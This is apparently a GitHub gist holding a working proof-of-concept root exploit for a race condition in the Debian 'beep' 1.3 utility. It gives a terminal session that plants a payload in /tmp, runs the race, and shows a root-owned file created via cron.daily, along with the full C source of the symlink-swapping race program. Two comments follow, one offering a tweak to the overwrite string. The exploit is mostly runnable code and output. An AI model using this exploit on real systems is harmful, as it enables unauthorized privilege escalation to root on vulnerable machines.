| fkt@debian:~$ uname -a | |
| Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux | |
| fkt@debian:~$ # wget http://snapshot.debian.org/archive/debian/20160117T220543Z/pool/main/b/beep/beep_1.3-4_amd64.deb | |
| fkt@debian:~$ /usr/bin/beep -v | |
| beep-1.3 | |
| fkt@debian:~$ gcc -O2 race.c -o race | |
| fkt@debian:~$ echo "touch /tmp/PWNED" > $(python -c 'print "/tmp/x\x12\x02g",') | |
| fkt@debian:~$ chmod +x /tmp/x* | |
| fkt@debian:~$ ./race 1000 3000 200 | |
| 2011 1000 | |
| [DEBUG] 1 times 1 ms beeps (100 delay between, 0 delay after) @ 440.00 Hz | |
| 2012 1000 | |
| [DEBUG] 1 times 1 ms beeps (100 delay between, 0 delay after) @ 440.00 Hz | |
| [DEBUG] 1 times 2016356980 ms beeps (2 delay between, 0 delay after) @ 65.00 Hz | |
| WON!! | |
| # if u do not want to wait | |
| fkt@debian:~$ cd / && sudo run-parts /etc/cron.daily | |
| fkt@debian:~$ ls -la /tmp/PWNED | |
| -rw-r--r-- 1 root root 0 Apr 5 06:14 /tmp/PWNED |
| #include <unistd.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <sys/types.h> | |
| #include <sys/wait.h> | |
| #include <sys/stat.h> | |
| #include <signal.h> | |
| #include <string.h> | |
| #include <errno.h> | |
| void handle_signal(int signum) { | |
| switch(signum) { | |
| case SIGINT: | |
| case SIGTERM: | |
| wait(NULL); | |
| exit(signum); | |
| } | |
| } | |
| int main(int argc, char **argv) | |
| { | |
| FILE *fp; | |
| char buf[10]; | |
| char *l = "b"; | |
| int b = atoi(argv[1]); | |
| int e = atoi(argv[2]); | |
| int t = atoi(argv[3]); | |
| int del = b; | |
| char *args[] = { "/usr/bin/beep", "--debug", "-e", l, "-l", "1", "-n", "-d", "2", "-f", "65", "-l", "2016356980", NULL }; | |
| signal(SIGINT, handle_signal); | |
| signal(SIGTERM, handle_signal); | |
| while (1) { | |
| int pid = fork(); | |
| if ( pid == 0 ) { // child | |
| unlink(l); | |
| symlink("/dev/input/event0", l); | |
| execv(args[0], args); | |
| } else { // parent | |
| usleep(del); | |
| unlink(l); | |
| symlink("/etc/default/bsdmainutils", l); | |
| kill(pid, SIGTERM); | |
| usleep(t); | |
| kill(pid, SIGKILL); | |
| waitpid(pid, NULL, 0); | |
| fp = fopen("/etc/default/bsdmainutils", "r"); | |
| fscanf(fp, "%4s", buf); | |
| if(!strcmp(buf, "t*/x")) { | |
| printf("WON!!\n"); | |
| exit(0); | |
| } | |
| fclose(fp); | |
| } | |
| del++; | |
| printf("%d %d\n", del, b); fflush(stdout); | |
| if (del > e) { | |
| printf("%d %d\n", del, b); fflush(stdout); | |
| del = b; | |
| usleep(1000*1000); | |
| } | |
| } | |
| return 0; | |
| } |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Show comment
Hide comment
SpComb
commented
Apr 5, 2018
|
I see what you did there And it seems like my analysis was actually correct... |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Show comment
Hide comment
fkt
Apr 6, 2018
Use '*/@ ' or something instead of 't*/x' to avoid fiddling with the \x12\x02g garbage for even more fun! (suggested by @edgarboda)
|
Use '*/@ ' or something instead of 't*/x' to avoid fiddling with the \x12\x02g garbage for even more fun! (suggested by @edgarboda) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I see what you did there
And it seems like my analysis was actually correct...